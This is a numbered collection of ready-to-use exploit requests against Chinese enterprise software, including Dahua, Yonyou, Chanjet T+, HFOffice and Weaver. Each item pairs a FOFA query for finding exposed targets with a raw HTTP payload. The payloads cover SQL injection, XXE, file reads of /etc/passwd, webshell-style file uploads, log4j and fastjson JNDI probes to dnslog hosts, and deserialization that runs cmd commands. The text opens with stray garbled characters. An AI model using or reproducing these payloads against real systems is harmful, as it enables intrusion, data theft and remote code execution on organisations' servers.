& f; @+ D1 g' ^/ y! Z8 w16.  红帆HFOffice医微云SQL注入( A( X  H8 c1 Q3 Z1 |, \3 t
FOFA:title="HFOffice"2 ~$ f  G, S8 K* m* I5 L: ~- x
poc中调用函数计算1234的md5值
2 c- U1 s5 i' S1 OGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
) i' u3 s( J  p/ L' {Host: x.x.x.x; S2 g6 c% w2 K" N/ z: T; M% m  \0 [
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
* a! `6 ~5 i1 pConnection: close
. w6 p' ~% T) H/ g; A4 K/ L! e, {1 GAccept: */*5 ^$ L+ ~7 a; D' M' N5 ]9 M
Accept-Language: en- t# f8 }! m1 g- k9 k
Accept-Encoding: gzip
0 K6 K) m6 r5 c# @( _) }3 n/ o4 y1 Y+ ?* q, j
7 e2 ~7 ]& x9 t# a
17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

MySQL error-based injection through a SOAP parameter; the XPath error in the response carries md5(102103122).

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

MySQL error-based; the database user is returned in the EXTRACTVALUE error.

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

fileUrl accepts a file: URL, so any file readable by the service account can be fetched through the picture endpoint.

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}}""}

This is the standard fastjson DNS probe and is deliberately malformed JSON: the java.net.URL object lands in the position of a map key, fastjson calls its hashCode(), and that resolves the host name before the parse fails. A lookup arriving at your DNS log service (replace farr9frh.dnslog.pw with your own) confirms an autoType-enabled fastjson on this endpoint; actual code execution still needs a gadget that matches the deployed fastjson version.

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{"loginName":"${jndi:ldap://dnslog}"}

Replace dnslog with your DNS log host; a lookup shows the loginName value reaches a vulnerable Log4j lookup. Exploitation beyond the probe requires an LDAP server you control.

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
Same probe as item 21, with a placeholder DNS log host.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://DNSLOG"}}""}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

The fname field controls the destination path and extension, so the .txt upload is written as a JSP under the web root; GET /2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp should then return 2XpU7Y2Els1K9wZvOlSmrgolNci.

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--


/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD


http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--


49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--


http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"


Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}


Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
